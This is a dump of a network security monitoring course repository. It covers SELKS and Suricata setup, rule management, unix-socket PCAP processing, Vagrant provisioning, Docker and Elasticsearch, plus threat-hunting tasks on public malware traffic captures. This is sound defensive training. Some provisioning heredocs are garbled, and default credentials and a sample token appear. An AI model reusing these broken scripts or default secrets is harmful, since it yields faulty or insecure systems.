`easy-setup.sh` script to prepare docker environment. It will prompt with a number of questions, including. Install what is needed. 18 | 19 | ``` 20 | sudo ./easy-setup.sh --es-memory 1G --ls-memory 1G 21 | ``` 22 | 23 | Note that this command limits Elasticsearch and Logstash memory to 1GB RAM. 24 | 25 | At the end of this run you will have: 26 | * docker installation; 27 | * docker-compose; 28 | * portainer for managing docker containers (if enabled); 29 | * prepared data for containers; 30 | * af-packet interface capture config for suricata; 31 | * environment setup for Elastic and Logstash memory caps; 32 | 33 | Alternatively, script can also be executed non-interactively with most options passed via command line. Make sure that interface `-i` matches something that exists on your system. 34 | 35 | ``` 36 | sudo ./easy-setup.sh --non-interactive -i tppdummy0 --iA --es-memory 1G --ls-memory 1G 37 | ``` 38 | 39 | Refer to live capture section on for how to set up a virtuan NIC for replays. 40 | 41 | Once setup is done, spin up containers with docker-compose. 42 | 43 | ``` 44 | sudo docker-compose up -d 45 | ``` 46 | 47 | To see the logs either omit the `-d` to call it in foreground or see the backend logs. 48 | 49 | ``` 50 | sudo docker-compose logs --follow 51 | ``` 52 | 53 | Once done, navigate to `https://192.168.56.13/` if using embedded vagrant env. Otherwise visit port 443 on whatever box was used. Default credentials are `selks-user:selks-user`. 54 | 55 | ## Reading PCAPs 56 | 57 | `SELKS/docker/scripts` folder has a helper for reading PCAP files. 
58 | 59 | ``` 60 | ./scripts/readpcap.sh -h 61 | Pcap reading script through Suricata 62 | Usage: ./scripts/readpcap.sh [-c|--(no-)cleanup] [-a|--(no-)autofp] [-s|--set-rulefile ] [-S|--set-rulefile-exclusive ] [-h|--help] [--] 63 | : Path to the pcap file to read. If specifies a directory, all files in that directory 64 | will be processed in order of modified time maintaining flow state between files. 65 | -c, --cleanup, --no-cleanup: Remove all previous data from elasticsearch and suricata. (off by default) 66 | -a, --autofp, --no-autofp: Run in autofp mode instead of single mode. (off by default) 67 | -s, --set-rulefile: Set a file with signatures, which will be loaded together with the rules set in the yaml. (no default) 68 | -S, --set-rulefile-exclusive: Set a file with signatures, which will be loaded exclusively, regardless of the rules set in the yaml. (no default) 69 | -h, --help: Prints help 70 | 71 | Usage: readpcap.sh [OPTIONS] 72 | ``` 73 | 74 | To read a single PCAP file in Suricata `autofp` mode, use following command. Note the `-c` flag which also cleans up any previously existing data. 75 | 76 | ``` 77 | sudo ./scripts/readpcap.sh -ac /data/2021-01-06-Remcos-RAT-infection.pcap 78 | ``` 79 | 80 | By navigating to **hunt** section and selecting **all** from **time picker**, you should see something like this. 81 | 82 | ![Hunt view](hunt-pcap-read.png) 83 | 84 | # Suricata Analytics 85 | 86 | Suricata Analytics is a project by Stamus Networks to develop Jupyter notebooks for EVE data exploration and threat hunting. Project can be cloned from public github repo: 87 | 88 | ``` 89 | git clone https://github.com/StamusNetworks/suricata-analytics 90 | ``` 91 | 92 | Within the confines of this training, we recommend setting up a python virtual environment for `docker-compose`. 93 | 94 | ``` 95 | cd suricata-analytics 96 | python3 -m venv .venv 97 | source .venv/bin/activate 98 | pip install docker-compose 99 | ``` 100 | 101 | Then build the container locally. 102 | 103 | ``` 104 | docker-compose build 105 | ``` 106 | 107 | Before starting the stack, make sure to set up `.env` file. Simply copy the packaged reference. 108 | 109 | ``` 110 | cp .env.example .env 111 | ``` 112 | 113 | Then edit the file. 114 | * `SCIRIUS_TOKEN` can be found (or generated) in SELKS UI. Click on your username on top-right corner, go to `account settings`, then click `Edit Token` on left-hand menu under `User Settings` box. If the token is empty, simply click `Regenerate`. Then copy and paste the value into env file. 115 | * `SCIRIUS_HOST` will be the IP hosting SELKS instance. If using Vagrant, it will be the day3-selks box on `192.168.56.13` 116 | * `SCIRIUS_TLS_VERIFY` must be `no` since training setup uses default self-signed certificate 117 | 118 | ``` 119 | SCIRIUS_TOKEN= 120 | SCIRIUS_HOST=192.168.56.13 121 | SCIRIUS_TLS_VERIFY=no 122 | ``` 123 | 124 | Once this is done, start the docker env. 125 | 126 | ``` 127 | docker-compose up -d 128 | ``` 129 | 130 | You need API authentication token from jupyter logs. Search for the following lines: 131 | 132 | ``` 133 | (.venv) vagrant@day3-clean:~/suricata-analytics$ docker-compose logs 134 | ... 135 | stamus_jupyter | [I 2022-10-14 14:47:54.615 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation). 
136 | stamus_jupyter | [C 2022-10-14 14:47:54.617 ServerApp] 137 | stamus_jupyter | 138 | stamus_jupyter | To access the server, open this file in a browser: 139 | stamus_jupyter | file:///home/jovyan/.local/share/jupyter/runtime/jpserver-6-open.html 140 | stamus_jupyter | Or copy and paste one of these URLs: 141 | stamus_jupyter | http://8ed1eee366bf:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678 142 | stamus_jupyter | or http://127.0.0.1:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678 143 | ``` 144 | 145 | Note that you must modify the IP to reflect your server. Meaning that `http://127.0.0.1:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678` becomes `http://192.168.56.13:8888/lab?token=0c7c34ada0ad6243decb1dcbb3654c1b9de2b423a10d2678` (if using vagrant env). 146 | 147 | # Tasks 148 | 149 | * get SELKS up and running 150 | * set up rule server with `python3 -m http.server` 151 | * set up a rule source in scirius and attach it to suricata 152 | * enable `tgreen/hunting` ruleset 153 | * import `2021-01-06-Remcos-RAT-infection` 154 | * what is the malicious domain used for stage1? 155 | * find the malicious EXE 156 | * what is the IP used to serve it? 157 | * import `2021-01-05-PurpleFox-EK-and-post-infection-traffic` 158 | * what is the IoC for malicious host? 159 | * look into `flow` records, does anything seem strange? 160 | * import `2022-01-01-thru-03-server-activity-with-log4j-attempts` 161 | * find encoded log4j script injection 162 | * decode it 163 | 164 | -------------------------------------------------------------------------------- /Suricata/selks/hunt-pcap-read.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ccdcoe/CDMCS/6ab06382f915e8ea0c54963876cbe42b7b37c4fb/Suricata/selks/hunt-pcap-read.png -------------------------------------------------------------------------------- /Suricata/suricata-update/README.md: -------------------------------------------------------------------------------- 1 | # suricata-update 2 | 3 | This section **does not** assume any knowledge about Suricata YAML configuration. Some references to it will be made. But student should be able to repeat all examples without touching the configuration file. 4 | 5 | However, the student should be familiar with: 6 | * Using Suricata with CLI flags (`-S`, `-l`, `-r`, `--af-packet=$IFACE`); 7 | * Parsing offline PCAP files / simple traffic replay; 8 | * Rule file, loading that rule file with `-S`; 9 | * Exploring `eve.json` using `jq`; 10 | * Suricata rulesets, downloading them manually, rule file layout, loading ruleset with `-S`; 11 | 12 | * https://suricata.readthedocs.io/en/latest/rule-management/suricata-update.html 13 | * https://suricata-update.readthedocs.io/en/latest/ 14 | 15 | ## Background 16 | 17 | * Downloading rules for first time is easy 18 | * But ongoing rule management (on CLI) used to be a pain 19 | * People had to use oldschool Snort tools like Oinkmaster or pulledpork 20 | * Or write their own update scripts 21 | * Trickier than it sounds, as rule manager needs to: 22 | * Download rules (from multiple sources) 23 | * Disable and modify rules according to your use cases 24 | * Ensure that next rule update does not overwrite yesterdays modifications! 25 | * No modern lightweight tools existed 26 | 27 | ## Enter suricata-update 28 | 29 | Now there's a modern tool directly from Suricata dev team. It's called `suricata-update`. 
It's provided with suricata 30 | sources and it is also very easy to install with `pip` 31 | 32 | ``` 33 | apt-get install python3-pip 34 | python3 -m pip install --upgrade --user suricata-update 35 | ``` 36 | 37 | First thing, check the `--help` flag. It has quite a lot functionality. 38 | 39 | ``` 40 | $HOME/.local/bin/suricata-update --help 41 | ``` 42 | 43 | ### Adding a source 44 | 45 | Predefined sources can be listed with `list-sources` subcommand. 46 | 47 | ``` 48 | $HOME/.local/bin/suricata-update list-sources 49 | ``` 50 | 51 | By default, only `et/open` is enabled. Other rule sources can be enabled with `enable-source` subcommand, with source name (that you found via `list-sources`) following that command. 52 | 53 | ``` 54 | $HOME/.local/bin/suricata-update enable-source tgreen/hunting 55 | ``` 56 | 57 | Note that default working directory for suricata-update is `/var/lib/suricata`. However, you might be running it as regular user. And you should be. **Downloading or modifying ruleset does not require admin privileges.** Permissions only come into play when reloading Suricata itself. 58 | 59 | Working directory can easily be overridden with `-D` flag. If you see **permission denied** or **working dir missing**, keep in mind that you can just use something else! And whatever you choose is up to you! 60 | 61 | ``` 62 | $HOME/.local/bin/suricata-update enable-source tgreen/hunting -D $WORKING_DIR 63 | ``` 64 | 65 | Calling `suricata-update` with no subcommand would then download all rules and merge them into `suricata.rules` in working directory of your choice. 66 | 67 | ``` 68 | $HOME/.local/bin/suricata-update -D $WORKING_DIR 69 | cat $WORKING_DIR/rules/suricata.rules | wc -l 70 | ``` 71 | 72 | Rule directory is usually defined in `suricata.yaml`. But again, you can just use `-S` to point Suricata directly to it. 73 | 74 | ``` 75 | default-rule-path: $WORKING_DIR/rules 76 | rule-files: 77 | - suricata.rules 78 | ``` 79 | 80 | ``` 81 | suricata -S $WORKING_DIR/rules/suricata.rules $OPTS 82 | ``` 83 | 84 | ### Disabling a source 85 | 86 | Disabling a source simply means calling `remove-source`, re-running update and reloading Suricata. 87 | 88 | ``` 89 | suricata-update remove-source tgreen/hunting -D $WORKING_DIR 90 | ``` 91 | 92 | ``` 93 | $HOME/.local/bin/suricata-update -D $WORKING_DIR 94 | ``` 95 | 96 | ### Configuration files 97 | 98 | `suricata-update` can parse multiple config files to apply ruleset transformations. Use `--dump-sample-configs` to have suricata-update dump their skeletons to local folder. Good idea is to create a separate clean folder for them. 99 | 100 | ``` 101 | mkdir configs 102 | cd configs 103 | suricata-update --dump-sample-configs 104 | ``` 105 | 106 | It will give you: 107 | * `update.yaml` for suricata-update itself; 108 | * `disable.conf` for disabling rules, SIDs, rule categories, rule files, etc; 109 | * `enable.conf` for the reverse; 110 | * `drop.conf` for IPS `drop` conversion; 111 | * `modify.conf` for rule customizations; 112 | * `threshold.in` for threshold setup; 113 | 114 | For example, `malware.rules` can be disabled with following content in `disable.conf`. Just a sample, that's actually one rule category you don't want to disable! 115 | 116 | ``` 117 | group: emerging-malware.rules 118 | ``` 119 | 120 | Then run `suricata-update` while pointing it toward `disable.conf`. 
121 | 122 | ``` 123 | $HOME/.local/bin/suricata-update -D $WORKING_DIR --disable-conf disable.conf 124 | ``` 125 | 126 | # Exercise 127 | 128 | * Select your own folder where the rules should be located. 129 | * Following rulesets should be activated: 130 | * `et/open` 131 | * `oisf/trafficid` 132 | * `ptresearch/attackdetection` 133 | * `tgreen/hunting` 134 | * Disable following rules: 135 | * Outbound Curl user-agent; 136 | * apt and yum package management; 137 | * Unix and BSD ping; 138 | * Suricata STREAM rules; 139 | * Write a crontab script that updates your ruleset and invokes suricata rule reload **without restarting it**; 140 | * Generate a simple report of unique alerts with counts per MTA PCAP; 141 | -------------------------------------------------------------------------------- /Suricata/unix-socket/README.md: -------------------------------------------------------------------------------- 1 | # Suricata Unix Socket 2 | 3 | This section **does not** assume any knowledge about Suricata YAML configuration. Some references to it will be made. But student should be able to repeat all examples without touching the configuration file. 4 | 5 | However, the student should be familiar with: 6 | * Using Suricata with CLI flags (`-S`, `-l`, `-r`, `--af-packet=$IFACE`); 7 | * Parsing offline PCAP files / simple traffic replay; 8 | * Rule file, loading that rule file with `-S`; 9 | * Exploring `eve.json` using `jq`; 10 | 11 | ## Background 12 | 13 | * Restarting suricata is a no no. If you have a lot of rules, this will take a long time 14 | * You would not want to miss anything, would you? 15 | 16 | ## Suricata can listen to a unix socket and accept commands from the user. 17 | 18 | see: 19 | * https://suricata.readthedocs.io/en/latest/unix-socket.html 20 | * https://suricata.readthedocs.io/en/latest/rule-management/rule-reload.html 21 | * https://home.regit.org/2012/09/a-new-unix-command-mode-in-suricata/ 22 | * https://github.com/inliniac/suricata/blob/89ba5816dc303d54741bdfd0a3896c7c1ce50d91/src/unix-manager.c#L922 23 | 24 | Unix socket can be enabled in YAML config. Note that this should be enabled by default, so current section does not require user to set it up. 25 | 26 | ``` 27 | unix-command: 28 | enabled: auto 29 | #filename: custom.socket 30 | ``` 31 | 32 | ## Using unix-socket mode 33 | 34 | Suricata has many runmodes. Student should already be familiar with `pcap reader` and `af-packet`. However, former will exit as soon as PCAP read is done and latter requires higher privileges with traffic generation to live interface. Both would need to *heat up* the ruleset first. Which is not ideal if you want to process a lot of PCAPs, debug large rulesets, etc. 35 | 36 | Solution is to launch suricata in unix socket mode. 37 | 38 | ``` 39 | suricata --unix-socket 40 | suricatasc 41 | ``` 42 | 43 | Note that Suricata would create unix socket regardless of runmode. However, explicit unix socket mode has a few benefits. Many were already mentioned in last paragraph, but this runmode will also enable commands that are unavailable in other runmodes. 44 | 45 | Most importantly, you will be able to feed PCAPs along with respective output folders directly to Suricata process running in userspace. 
Great for network forensics 46 | 47 | ``` 48 | suricatasc -c capture-mode 49 | suricatasc -c "pcap-file $PCAP $LOG_DIR" 50 | ``` 51 | 52 | ## Looping over values in bash 53 | 54 | ``` 55 | for pcap in `find /$PCAP_DIR -type f -name '*.pcap'` ; do 56 | suricatasc -c "pcap-file $pcap $LOG_DIR/$PCAP" 57 | done 58 | ``` 59 | 60 | ## Tasks 61 | 62 | * Start suricata in unix-socket runmode 63 | * Parse all MTA PCAPs! 64 | -------------------------------------------------------------------------------- /Suricata/vagrant/README.md: -------------------------------------------------------------------------------- 1 | # Vagrant boxes 2 | 3 | see: [Our vagrant tutorial for reference and usage](/common/vagrant). 4 | 5 | ## Day1 6 | 7 | * [GOTO](/Suricata/vagrant/day1) 8 | 9 | A simple minimal VM with Suricata preinstalled. Nothing needs to be set up, student can get straight to work with rules and CLI usage. 10 | 11 | ## Day2 12 | 13 | * [GOTO](/Suricata/vagrant/day2) 14 | 15 | Blank VM. Students have to build and configure Suricata themselves. 16 | 17 | ## Day3 18 | 19 | * [GOTO](/Suricata/vagrant/day3) 20 | 21 | Multi-VM setup with appliance setup. First one is for setting up SELKS dockerized appliance. Second is a blank VM for custom elastic setup (if interest) or for jupyter notebook hosting. 22 | -------------------------------------------------------------------------------- /Suricata/vagrant/day1/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | NAME = 'day1'.freeze 5 | MEM = 1024 6 | CPU = 4 7 | 8 | Vagrant.configure(2) do |config| 9 | config.vm.define NAME do |box| 10 | box.vm.box = 'generic/ubuntu2004' 11 | box.vm.hostname = NAME 12 | box.vm.synced_folder '..', '/vagrant' 13 | box.vm.synced_folder '../../', '/cdmcs-suricata' 14 | box.vm.synced_folder '../../../data/', '/data' 15 | box.vm.network :private_network, ip: '192.168.56.11' 16 | box.vm.provider :virtualbox do |vb| 17 | vb.customize ['modifyvm', :id, '--memory', MEM] 18 | vb.customize ['modifyvm', :id, '--cpus', CPU] 19 | end 20 | box.vm.provision 'docker', images: [] 21 | box.vm.provision 'shell', path: 'provision.sh' 22 | end 23 | end 24 | -------------------------------------------------------------------------------- /Suricata/vagrant/day1/provision.sh: -------------------------------------------------------------------------------- 1 | 2 | FILE=/etc/sysctl.conf 3 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE < /dev/null 2>&1 \ 20 | && apt-get update > /dev/null \ 21 | && apt-get install -y suricata > /dev/null 22 | 23 | systemctl stop suricata.service 24 | systemctl disable suricata.service 25 | 26 | echo "Adding detects for SURICATA" 27 | FILE=/etc/suricata/cdmcs-detect.yaml 28 | grep "CDMCS" $FILE || cat >> $FILE <> $FILE <> $FILE < Go, also known as golang, is a computer programming language whose development began in 2007 at Google, and it was introduced to the public in 2009. Golang was explicitly engineered to thrive in projects built by large groups of programmers with different skill levels. 4 | > Concurrency, easy one binary deploy with yet fast build times. 
5 | 6 | # go setup 7 | 8 | ``` 9 | 10 | GOLANG="go1.10.linux-amd64.tar.gz" 11 | 12 | cd /tmp 13 | wget -q -4 https://storage.googleapis.com/golang/$GOLANG 14 | tar -zxvf $GOLANG -C /usr/local/ > /dev/null 2>&1 15 | echo 'export GOROOT=/usr/local/go' >> ~/.bashrc 16 | echo 'export GOPATH=/opt/go' >> ~/.bashrc 17 | echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc 18 | export GOROOT=/usr/local/go 19 | export GOPATH=/opt/go 20 | export PATH=$PATH:$GOROOT/bin:$GOPATH/bin 21 | mkdir -p /opt/go 22 | cd /opt/go 23 | go version 24 | go env 25 | 26 | ``` 27 | -------------------------------------------------------------------------------- /common/certstream-mining.md: -------------------------------------------------------------------------------- 1 | ## Cert Transparency overview 2 | 3 | https://www.certificate-transparency.org/ 4 | 5 | ## An attempt with Naive Bayes and RF 6 | 7 | https://github.com/sulliwan/mustmets 8 | 9 | * Uses Google safebrowsing and various DNSBL-s to check domains for blacklists 10 | * Takes a lexicon of "suspicious words" 11 | * Converts the certstream to a binary bag of words per domain name 12 | * Attempts to train classifiers on that data 13 | 14 | ## Actually working example 15 | 16 | https://github.com/x0rz/phishing_catcher 17 | 18 | * Uses a custom ruleset to calculate a score per domain 19 | 20 | ## Main problems 21 | 22 | * There is actually very little data in the stream, mostly just the domain name which is interesting 23 | * Very unbalanced dataset (proportion of phishing/malware domains to legit domains is very low) 24 | * Future problem: Let's Encrypt will issue wildcard certs, which reduce the amount of meaningful data even further 25 | -------------------------------------------------------------------------------- /common/day_intro.md: -------------------------------------------------------------------------------- 1 | # Intro 2 | 3 | * [CCDCOE](https://www.youtube.com/watch?v=afu7r7G2res) 4 | * Course 5 | * Designed as hands-on classroom course 6 | * *from techies for techies* 7 | * Tentative timeline, rearranging topics as needed 8 | * Building 9 | * Classroom 10 | * No slides, only markdown, Vagrantfiles and instructors in classroom 11 | * Assistance 12 | * Make students go through painful troubleshooting on purpose! 13 | * You don't store this knowledge from listening to lectures or copy-pasting commands 14 | * Coffee breaks 15 | * Get a coffee/tea/break when you need it 16 | * Lunch 17 | * Smoking 18 | * Social 19 | * Admin remarks 20 | 21 | ## Tooling 22 | 23 | * GitHub 24 | * Vagrant (optionally) 25 | * Linux 26 | * Command line 27 | * Docker 28 | * Jupyter notebooks 29 | -------------------------------------------------------------------------------- /common/docker/README.md: -------------------------------------------------------------------------------- 1 | # Docker 2 | 3 | * https://docs.docker.com/get-started/ 4 | * https://docs.docker.com/compose/gettingstarted/ 5 | * https://docs.docker.com/engine/reference/builder/ 6 | 7 | ## Docker is 8 | * an application containerization tool 9 | * not a virtualization platform (container contents are executed on host) 10 | 11 | ## Install 12 | * https://docs.docker.com/install/linux/docker-ce/ubuntu/ 13 | * https://wiki.archlinux.org/index.php/Docker 14 | 15 | ## install docker-ce on ubuntu 16 | 17 | Always use up to date version of docker engine. 
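To see what the stock Ubuntu repositories would give you before adding the upstream repository below, check the candidate version first (assuming the distribution package name `docker.io`):

```
apt-cache policy docker.io
```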
18 | 19 | ``` 20 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - 21 | sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" 22 | ``` 23 | ``` 24 | apt-get update && apt-get install docker-ce 25 | ``` 26 | ``` 27 | systemctl start docker 28 | systemctl enable docker 29 | ``` 30 | 31 | ## List images on system 32 | 33 | Docker is designed around images which are in turn used to deploy new containers. An image is simply a stack of virtual file system diffs layered upon each other. In other words, deploying a new container does not copy base image data as is often the case with virtual machines, but only creates a volatile diff. 34 | 35 | Locally present images can be listed with following command. 36 | 37 | ``` 38 | docker images 39 | ``` 40 | 41 | ## Pull image from public repository 42 | 43 | * https://docs.docker.com/engine/reference/commandline/run/ 44 | 45 | New images can be pulled from public or private registries. Pull can be done explicitly with `docker pull` but us not needed. Invoking `docker run` on locally missing container will cause the deamon to automatically pull the image if it exists in configured registry. [Docker hub](https://hub.docker.com/) is used by default. So be careful what you pull. Each image can have tags. In other words, `debian:stretch` and `debian:jessie` are not two distinct images, but rather two versions of the same container. 46 | 47 | ``` 48 | docker pull debian:stretch 49 | docker run -ti --rm --name firstcontainer debian:stretch 50 | ``` 51 | 52 | ## Execute any command inside running container 53 | 54 | You can enter a running container with `exec` subcommand. Note that `-ti` is needed to keep console stdout open. Containers can be entered using container `--name` or id that can be found using `docker ps` command. Container that does not have explicit name configured will get a random name from the daemon. 55 | 56 | ``` 57 | docker exec -ti firstcontainer /bin/bash 58 | ``` 59 | 60 | ## Building a new container 61 | 62 | * https://docs.docker.com/engine/reference/builder/ 63 | 64 | Containers are not configured nor used manually. Exec should only be used to debug build or networking issues. Custom images are built using a `Dockerfile`. 65 | 66 | ``` 67 | vim $PWD/Dockerfile 68 | ``` 69 | 70 | Each line in Dockerfile corresponds to a differential file system layer. The following command `apt-get` is written as one line because this approach will update the cache temporarily during build time, install bash shell and then clean up local package manager cache. Installed package would remain in the image by cache will not. In other words, separating `install` and `autoremove` commands to two distinct lines would result in package cache remain in the first layer and therefore the image size will be significantly larger. 71 | 72 | ``` 73 | FROM debian:stretch 74 | 75 | RUN apt-get update && apt-get install -y bash && apt-get -y autoremove && apt-get -y autoclean 76 | 77 | CMD /bin/bash -c "echo useless" 78 | ``` 79 | 80 | Build command can then be executed in local directory, defined by `.`. 81 | 82 | ``` 83 | docker build -t local/useless . 84 | ``` 85 | 86 | ## Run multiple containers 87 | 88 | * https://docs.docker.com/compose/ 89 | 90 | Many methods exist to run multiple containers. For example, a web site usually depends on a database. 
A correct *docker way* would be to separate those two into two distinct containers, as each container is designed to handle a single application with `PID` 1. 91 | 92 | ``` 93 | apt-get install docker-compose 94 | #python3 -m pip install --user --upgrade docker-compose 95 | vim docker-compose.yml 96 | ``` 97 | ``` 98 | version: '3' 99 | services: 100 | web: 101 | image: httpd 102 | ports: 103 | - "5000:5000" 104 | redis: 105 | image: "redis:alpine" 106 | ``` 107 | ``` 108 | docker-compose up 109 | ``` 110 | 111 | ## Networking 112 | 113 | Docker containers are relegated to private bridge networks. A single container that does not have `--network` flag defined would therefore be assigned to a private network. Services inside containers are exposed to host using port forwarding. 114 | 115 | The following command would forward local port 88 to internal container port 80 when starting a web server. 116 | 117 | ``` 118 | docker run -ti -p localhost:88:80 httpd 119 | ``` 120 | 121 | Existing networks can be seen using `docker network ls` command. Following commands would create a new network with `bridge` driver and add two elastic stack containers there. 122 | 123 | ``` 124 | DOCKER_ELA="docker.elastic.co/elasticsearch/elasticsearch-oss:6.5.4" 125 | DOCKER_KIBANA="docker.elastic.co/kibana/kibana-oss:6.5.4" 126 | 127 | docker network create -d bridge cdmcs 128 | docker run -it -d --name elastic -h elastic --network cdmcs -p 127.0.0.1:9200:9200 $DOCKER_ELA 129 | docker run -it -d --name kibana -h kibana --network cdmcs -e "ELASTICSEARCH_URL=http://elastic:9200" -p 5601:5601 $DOCKER_KIBANA 130 | ``` 131 | 132 | Note that containers commonly allow configuration via environmental variables. This support has to be built into individual container, so refer to image documentation for supported variables. In this example, `ELASTICSEARCH_URL` configures connection URL in kibana container to be `http://elastic:9200`, whereas *elastc* refers to `--name` of first container. Internal docker proxy will handle the name resolution as container internal IP addresses are assigned dynamically. Note that `-h` sets the internal hostname string for container. This has no effect on name resolution, but cab be useful for logging as syslog hostname field would be randomly generated string that is not consistent between container redeployments. 133 | 134 | Note that docker-compose will automatically handle this common network unless explicitly configured. 135 | 136 | ## Persistence 137 | 138 | Docker file system is volatile and should only be used to store application code, dependencies, and critical system tools and libraries. No data should be stored there unless it is for testing or development! Furthermore, Docker file system layers can degrade the performance of IO intensive application. 139 | 140 | A simple solution would be to map a local file system folder as docker volume with `-v` flag. 141 | 142 | ``` 143 | docker run -it -d -v /home/user/appdata:/usr/share/elasticsearch/data -p 127.0.0.1:9200:9200 $DOCKER_ELA 144 | ``` 145 | 146 | Note that *UID* inside the container must have write permissions to the host folder, otherwise the app will fail. It is possible to also remap the UID via docker command line flags, but a proper way to handle this is to create a dedicated volume. 
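For reference, the flag-based remap mentioned above could look roughly like this (a sketch; `1000` is assumed to match the owner of the host folder, and not every image tolerates an overridden user):

```
docker run -it -d --user 1000:1000 -v /home/user/appdata:/usr/share/elasticsearch/data -p 127.0.0.1:9200:9200 $DOCKER_ELA
```

The dedicated volume shown below avoids the ownership issue altogether.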
147 | 148 | ``` 149 | docker volume create myvol 150 | docker run -it -d -v myvol:/usr/share/elasticsearch/data -p 127.0.0.1:9200:9200 $DOCKER_ELA 151 | ``` 152 | 153 | Note that this volume is not using docker virtual filesystems and is actually kept separate on host filesystem (unless using alternative drivers). Verify the data by looking into docker data dir. 154 | 155 | ``` 156 | ls -lah /var/lib/docker/volumes/ 157 | ``` 158 | -------------------------------------------------------------------------------- /common/elastic/README.md: -------------------------------------------------------------------------------- 1 | # elastic stack 2 | 3 | ## E and L and K 4 | * https://www.elastic.co/guide/en/elastic-stack/current/elastic-stack.html 5 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/_basic_concepts.html 6 | * https://www.elastic.co/guide/en/logstash/6.1/pipeline.html 7 | * https://www.elastic.co/guide/en/kibana/6.x/introduction.html 8 | 9 | ## E without L 10 | * http://www.rsyslog.com/doc/v8-stable/configuration/modules/omelasticsearch.html 11 | * https://raw.githubusercontent.com/markuskont/salt-elasticsearch/master/tests/json2ela.py 12 | * https://github.com/markuskont/salt-elasticsearch/blob/master/tests/shipper.js 13 | * https://elasticsearch-py.readthedocs.io/en/master/ 14 | * https://github.com/elastic/elasticsearch-js 15 | * https://github.com/olivere/elastic 16 | * [python example](elastic.shipper.py) 17 | 18 | ## E with other friends 19 | * [kafka](https://www.elastic.co/blog/just-enough-kafka-for-the-elastic-stack-part1) 20 | * [redis](https://www.elastic.co/blog/just_enough_redis_for_logstash) 21 | * [docker](docker-compose.yml) 22 | * [vagrant](https://github.com/markuskont/salt-elasticsearch) 23 | -------------------------------------------------------------------------------- /common/elastic/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.2' 2 | services: 3 | elasticsearch: 4 | image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.1.2 5 | container_name: elasticsearch 6 | ports: 7 | - "9200:9200" 8 | #- "9300:9300" 9 | environment: 10 | #- cluster.name=docker-cluster 11 | - "ES_JAVA_OPTS=-Xmx16g -Xms16g" 12 | ulimits: 13 | memlock: 14 | soft: -1 15 | hard: -1 16 | volumes: 17 | - type: bind 18 | source: /srv/pcap/elasticsearch 19 | target: /usr/share/elasticsearch/data 20 | kibana: 21 | image: docker.elastic.co/kibana/kibana-oss:6.1.2 22 | container_name: kibana 23 | ports: 24 | - "5601:5601" 25 | depends_on: 26 | - elasticsearch 27 | logstash: 28 | image: docker.elastic.co/logstash/logstash-oss:6.1.2 29 | container_name: logstash 30 | depends_on: 31 | - elasticsearch 32 | volumes: 33 | - ./logstash-redis-ela.conf:/usr/share/logstash/pipeline/logstash.conf 34 | redis: 35 | image: redis 36 | container_name: redis 37 | ports: 38 | - "6379:6379" 39 | -------------------------------------------------------------------------------- /common/elastic/elastic.api.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch API 2 | 3 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/docs.html 4 | * https://elasticsearch-py.readthedocs.io/en/master/ 5 | * https://www.elastic.co/guide/en/elasticsearch/client/javascript-api/current/api-reference.html 6 | * https://github.com/olivere/elastic 7 | * https://gist.github.com/markuskont/1cfffc8c813806364200ecf2fa7eaaad 8 | * 
https://gist.github.com/markuskont/499ee5113ecaf63e7f98c8a4b2343f1f 9 | -------------------------------------------------------------------------------- /common/elastic/elastic.config.basic.md: -------------------------------------------------------------------------------- 1 | # basic configuration 2 | 3 | ## JVM heap size 4 | 5 | * rule of thumb is 50% available memory 6 | * not so important when just testing [(amount of data matters)](https://www.elastic.co/blog/found-understanding-memory-pressure-indicator) 7 | * https://www.elastic.co/guide/en/elasticsearch/guide/current/heap-sizing.html 8 | 9 | ``` 10 | vim /etc/elasticsearch/jvm.options 11 | ``` 12 | 13 | ``` 14 | -Xms1g 15 | -Xmx1g 16 | ``` 17 | 18 | ## rename 19 | 20 | * not really needed but becomes important later for clustered setup 21 | 22 | ``` 23 | vim /etc/elasticsearch/elasticsearch.yml 24 | ``` 25 | 26 | ``` 27 | cluster.name: CDMCS 28 | node.name: babbysfirstelasticsearch 29 | ``` 30 | 31 | ## data directory 32 | 33 | * default is fine, but example may be useful if you need to add disks to existing boxes 34 | * [though this was not so nice](https://www.elastic.co/blog/multi-data-path-bug-in-elasticsearch-5-3-0) 35 | * does not do striping! 36 | * you cannot allocate shards to specific disks! 37 | 38 | ``` 39 | mkdir -p /srv/elasticsearch/{0,1} 40 | chown elasticsearch /srv/elasticsearch/{0,1} 41 | ``` 42 | ``` 43 | path.data: /srv/elasticsearch/0,/srv/elasticsearch/1 44 | ``` 45 | 46 | ``` 47 | ls -lah /srv/elasticsearch/*/nodes/* 48 | ``` 49 | 50 | ## log directory 51 | 52 | * do not leave unconfigured 53 | 54 | ``` 55 | path.logs: /var/log/elasticsearch 56 | ``` 57 | 58 | ## roles 59 | 60 | * all roles should be enabled on single node 61 | 62 | ``` 63 | http.host: 127.0.0.1 64 | 65 | node.data: true 66 | node.ingest: true 67 | node.master: true 68 | ``` 69 | 70 | ---- 71 | 72 | next -> [creating your first template](elastic.mappings.md) 73 | -------------------------------------------------------------------------------- /common/elastic/elastic.config.example.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch config 2 | 3 | ``` 4 | cluster: 5 | name: josephine 6 | discovery: 7 | zen: 8 | ping: 9 | unicast: 10 | hosts: 11 | - 192.168.10.120 12 | - 192.168.10.82 13 | - 192.168.10.122 14 | http: 15 | enabled: true 16 | host: 0.0.0.0 17 | network: 18 | host: 192.168.10.140 19 | node: 20 | data: false 21 | ingest: false 22 | master: false 23 | name: es-proxy-0.labor.sise 24 | path: 25 | data: 26 | - /srv/elasticsearch/0 27 | - /srv/elasticsearch/1 